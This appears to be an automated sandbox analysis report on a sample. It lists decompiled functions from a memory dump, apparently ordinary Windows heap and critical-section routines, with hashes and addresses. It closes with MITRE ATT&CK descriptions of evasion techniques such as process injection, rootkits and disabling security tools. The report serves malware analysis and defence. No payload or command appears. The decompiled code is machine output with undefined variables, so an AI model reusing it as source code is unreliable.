Opcode ID: bd4b435a67853e9698337e4232d55e2a92b2731adf0c540a185a2fd1a23f73b2
Instruction ID: 7fd6600f77ca96b7120301c6c150a7832640eb249012f6a0aee3f88a4863c931
Opcode Fuzzy Hash: bd4b435a67853e9698337e4232d55e2a92b2731adf0c540a185a2fd1a23f73b2
Instruction Fuzzy Hash: BDF0E232A296888FDB74C71CC28CF22B7E9BB047B8F045465D50787922C7A4EC41C740

Uniqueness

Uniqueness Score: -1.00%

Function 05468B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E05468B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x548d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E053B7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E053DB640(E053D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x05468b67
0x05468b6f
0x05468b72
0x05468b7d
0x05468b8f
0x05468b7f
0x05468b88
0x05468b88
0x05468b9a
0x05468b9b
0x05468b9d
0x05468ba2
0x05468bb5

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a82ee48e8fc2c6bbb89359f28497f7622a3d87be9b6e1e1c92e725c7d55a2ea7
Instruction ID: a667a98d5af8f80763ffa4ecb649dea1d0f5a11e3bc29d537c85421725a4ad0a
Opcode Fuzzy Hash: a82ee48e8fc2c6bbb89359f28497f7622a3d87be9b6e1e1c92e725c7d55a2ea7
Instruction Fuzzy Hash: 7DF05EB1B14258AFDB14EBA8E90AEAEB7B4EB04600F040499BA059B381EA74D901C795

Uniqueness

Uniqueness Score: -1.00%

Function 053CA44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053CA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x5487b9c; // 0x0
				_t15 = __ecx;
				_t16 = L053B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E053DFA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x053ca44b
0x053ca453
0x053ca472
0x053ca476
0x00000000
0x053ca493
0x053ca47a
0x053ca47f
0x053ca486
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84890b8274a780d546eb1449e56d69bc394447f15afd09c9c81d30a36d580718
Instruction ID: 46140d8cef24ad765a27930c4cc374ee91d4670408117f7b3245dd6b65273d17
Opcode Fuzzy Hash: 84890b8274a780d546eb1449e56d69bc394447f15afd09c9c81d30a36d580718
Instruction Fuzzy Hash: ECE02272B05420ABD2128E18BC00FA6B7AEEBD0601F0D0078F505C7210DA68DD11C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0539F358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0539F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E053CF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L053B4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x0539f35d
0x0539f361
0x0539f367
0x0539f372
0x0539f38c
0x0539f38c
0x0539f394

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: f237f40ad9724a3550a8f193db888e693ae2705b06c63cc61735b57bad15350a
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 7AE0DF72A40118BBDF22AAD99E09FAABBADEB48A60F000195BA04D7150D5A89E00C2D0

Uniqueness

Uniqueness Score: -1.00%

Function 053AFF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053AFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x53711a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E054688F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E053B0050(_t14);
				}
			}

0x053aff66
0x053aff6b
0x00000000
0x053aff8f
0x00000000
0x053aff8f

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96cf98b4524544100b2064e64758257ad1380dfd2d3499dd2ffdd215383722a0
Instruction ID: ef57aaa8d35117ffb5f81b7b763ab901c7d033dc052c0fd9a645348bcdff3b49
Opcode Fuzzy Hash: 96cf98b4524544100b2064e64758257ad1380dfd2d3499dd2ffdd215383722a0
Instruction Fuzzy Hash: A3E0DFBA6092849FD734DB52D0C4F2537ADEB42621F19801EE0084B501C661D880C266

Uniqueness

Uniqueness Score: -1.00%

Function 054241E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E054241E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x54708f0);
				_t5 = E053ED08C(__ebx, __edi, __esi);
				if( *0x54887ec == 0) {
					E053AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x54887ec == 0) {
						 *0x54887f0 = 0x54887ec;
						 *0x54887ec = 0x54887ec;
						 *0x54887e8 = 0x54887e4;
						 *0x54887e4 = 0x54887e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L05424248();
				}
				return E053ED0D1(_t5);
			}

0x054241e8
0x054241ea
0x054241ef
0x054241fb
0x05424206
0x0542420b
0x05424216
0x0542421d
0x05424222
0x0542422c
0x05424231
0x05424231
0x05424236
0x0542423d
0x0542423d
0x05424247

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d856f31750e98f18643d663e94e15411ad6c7d6f233f3286a82bbe34aeb0894f
Instruction ID: 2322cb1937f95b6a95aed8d418155cbe63916f450814898658d64e563248c344
Opcode Fuzzy Hash: d856f31750e98f18643d663e94e15411ad6c7d6f233f3286a82bbe34aeb0894f
Instruction Fuzzy Hash: FBF01C74D61B10CFCBA8EF6599097ECBAB6F744B50FD0495EA004A7284CB344440CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0544D380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0544D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0539E8B0(__ecx, _a4, 0xfff);
					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0544d38a
0x0544d39b
0x0544d3b1
0x00000000
0x0544d3b6
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: b5fa2f40d70469d06a8191fdb15d4a5274be27e578c17858e99ef0961ee9cf1b
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 87E08631284244A7EB225A44CC00FB57616DB40790F104031BE045AA90C5719C51DAC4

Uniqueness

Uniqueness Score: -1.00%

Function 053CA185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053CA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x54867e4 >= 0xa) {
					if(_t5 < 0x5486800 || _t5 >= 0x5486900) {
						return L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E053B0010(0x54867e0, _t5);
				}
			}

0x053ca190
0x053ca1a6
0x053ca1c2
0x00000000
0x00000000
0x00000000
0x053ca192
0x053ca192
0x053ca19f
0x053ca19f

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 729e840dc5d26dbfb06c179587577707ebeaa33b60e25ce55cd7762488fa94af
Instruction ID: 75918be2fd92bc0027a9a2cb01991b749c74e1ee1f5dc87f0022fe1b49863532
Opcode Fuzzy Hash: 729e840dc5d26dbfb06c179587577707ebeaa33b60e25ce55cd7762488fa94af
Instruction Fuzzy Hash: 3CD02E712350042AD72CB3109899BBA3A22E7D0B10FB2088EF2074E9A0EFA0CCD08249

Uniqueness

Uniqueness Score: -1.00%

Function 053C16E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053C16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E053C1710(0x54867e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L053B4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x053c16e8
0x053c16ef
0x053c16f3
0x053c16fe
0x00000000
0x053c1700
0x053c170d
0x053c170d
0x053c16f2
0x053c16f2
0x053c16f2
0x053c16f2

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b17a7c313944b9868852da462dc4808bf547aeed9d7760240cbb4b902a2dddc8
Instruction ID: 81e54e68e8c012426689876bd743f14d66d4df5b60b74a244dc6e47b8ff592ef
Opcode Fuzzy Hash: b17a7c313944b9868852da462dc4808bf547aeed9d7760240cbb4b902a2dddc8
Instruction Fuzzy Hash: 70D0A73120010052DE2D5B10DC48B142652EB80B81F38009CF60B498C2CFF5CCA2F14C

Uniqueness

Uniqueness Score: -1.00%

Function 053C35A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053C35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E053AEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x053c35a1
0x053c35a1
0x053c35a5
0x053c35ab
0x053c35ab
0x053c35b5
0x00000000
0x053c35c1
0x053c35b7

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 757dd60f6ebc00e3824751a7b1832808218a4007c966408648951163518f5fe9
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: DBD0A93260A1809EDB01EB10C228B683BB6FB0020EF58A8ED800206952CB7A4E0EE700

Uniqueness

Uniqueness Score: -1.00%

Function 053AAAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053AAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x053aaab6
0x053aaabb
0x053fa442
0x00000000
0x053fa448
0x053fa454
0x053fa454
0x053aaac1
0x053aaac1
0x053aaac6
0x053aaac6

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 08dd075edd13799ff2d9f5626fb53127780fa59718e315f95933e0aff20aa19e
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 2CD0E936352A80CFD616CF5DC558B1573A5FB44B44FC504A0E505CB765E66CDD54CA10

Uniqueness

Uniqueness Score: -1.00%

Function 0541A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0541A537(intOrPtr _a4, intOrPtr _a8) {

				return L053B8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0541a553

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: aafc7f4106ec791d212bea1f967fa665b88a47562f1b853855ad4bfbf6179dfc
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 4DC01232280248BBCB126E81CC01F46BB2AEB94B60F008010BA080B9608672E970EA84

Uniqueness

Uniqueness Score: -1.00%

Function 0539DB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0539DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L053B4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x0539db4d
0x0539db54
0x0539db5f
0x0539db56
0x0539db56
0x0539db5c
0x0539db5c

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 2544438a4c5bb3913ac0101945bc190d06ddc8a7d6069290919f3c6e2626f557
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 90C08C70390A00AAEF261F20CD02B4036A1BB00B01F4404A06301DA4F0DBBCD801E600

Uniqueness

Uniqueness Score: -1.00%

Function 0539AD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0539AD30(intOrPtr _a4) {

				return L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x0539ad49

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 9a1de582288f14f695d644dd49bbc1669bca63ca28aec6339a437df8424b83ea
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 79C08C32180288BBC7126A45CD01F117B29E790B60F000020B6044AA618972E861D588

Uniqueness

Uniqueness Score: -1.00%

Function 053B3A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053B3A1C(intOrPtr _a4) {
				void* _t5;

				return L053B4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x053b3a35

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 1282c27950cddcb97e71fc956ad9ec27dbad0419de6038842ed8098d9f838cb6
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 8AC02B33180248BBCB126F41DC00F017F2EE790B60F000020F7040B971C576EC60D58C

Uniqueness

Uniqueness Score: -1.00%

Function 053A76E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053A76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x053a76e4
0x00000000
0x053a76f8
0x053a76fd

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: e8f24d716c01cd67fde1cbdad22b750e212da32db827333a54f50fda739bf9df
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 14C08C722411C05AEB2A5708CE65F303650FB88708F48019CAA024D8B1C3E8A803C308

Uniqueness

Uniqueness Score: -1.00%

Function 053C36CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053C36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L053B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x053c36d2
0x053c36e8
0x053c36d4
0x053c36e5
0x053c36e5

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: e7c181bb637c172bb56712aa386228cdf75cdeb76e2d8206b3fe788807608bd3
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: A1C02B70351440BBEB151F30CD40F147254F700A21F6407987320458F0D5AC9C00D204

Uniqueness

Uniqueness Score: -1.00%

Function 053B7D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053B7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x053b7d56
0x053b7d5b
0x053b7d60
0x053b7d5d
0x053b7d5d
0x053b7d5d

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 9b2bac15e89e31b0a1e8f169be502c708f11097548c5ac665b34a36f7b77a049
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 8AB092343019408FDF16DF18C080F6533E4FB84A80B8400D8E400CBA20D269E8008A00

Uniqueness

Uniqueness Score: -1.00%

Function 0542FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0542FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E053DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05425720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05425720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0542fdda
0x0542fde2
0x0542fde5
0x0542fdec
0x0542fdfa
0x0542fdff
0x0542fe0a
0x0542fe0f
0x0542fe17
0x0542fe1e
0x0542fe19
0x0542fe19
0x0542fe19
0x0542fe20
0x0542fe21
0x0542fe22
0x0542fe25
0x0542fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0542FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0542FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0542FE01

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 19bc4cf8ec246f2cd9bb25802097a8ec8b0f4236e38b5aae1fa8e90949166b16
Instruction ID: 474548063a88f483c06577c21d9548c1b2070a1b509c67263b8c943c038deacd
Opcode Fuzzy Hash: 19bc4cf8ec246f2cd9bb25802097a8ec8b0f4236e38b5aae1fa8e90949166b16
Instruction Fuzzy Hash: CEF0F676240221BFD7252A45DC06FB3BB6AEB84730F540315F6285A1D1DA62FC3096F0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
